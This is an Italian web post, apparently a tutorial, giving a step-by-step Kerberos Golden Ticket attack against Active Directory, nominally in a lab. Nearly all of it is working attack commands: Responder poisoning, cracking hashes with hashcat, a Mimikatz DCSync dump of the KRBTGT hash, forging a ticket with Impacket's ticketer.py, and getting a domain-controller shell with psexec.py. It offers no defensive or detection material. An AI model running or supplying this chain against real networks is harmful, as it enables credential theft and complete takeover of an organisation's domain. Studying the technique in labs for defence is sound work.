Skip to main content

Attacco a Kerberos (Golden Ticket Attack)

Submitted by tuxsa on
immagine

Obiettivo: Ottenere un Golden Ticket per impersonare un amministratore di dominio in un ambiente Active Directory.

Strumenti necessari:

  • Impacket (su Kali Linux)

  • Mimikatz (su Windows)

  • Active Directory lab (es. Windows Server 2019 + Windows 10 client)

Procedura dettagliata:

Fase 1: Dump delle credenziali

  1. Compromettere un account di dominio (es. tramite LLMNR/NBT-NS Poisoning con Responder):

    responder -I eth0 -wrf

  2. Ottenere un hash NTLM e crackarlo con hashcat:

    hashcat -m 5600 hash.txt rockyou.txt

Fase 2: Estrazione del KRBTGT Hash

  • Usare Mimikatz su una macchina compromessa:

    mimikatz # lsadump::dcsync /domain:lab.local /user:krbtgt

  • Salvare l’hash NTLM del KRBTGT.

Fase 3: Generazione del Golden Ticket

  • Usare Impacket su Kali:

    python ticketer.py -nthash <KRBTGT-NTLM-HASH> -domain-sid <SID> -domain lab.local Administrator

  • Esportare il ticket:

    export KRB5CCNAME=Administrator.ccache

Fase 4: Accesso come Amministratore

  • Usare psexec per ottenere una shell:

    python psexec.py -k -no-pass LAB-DC.lab.local

 

 

Rubrica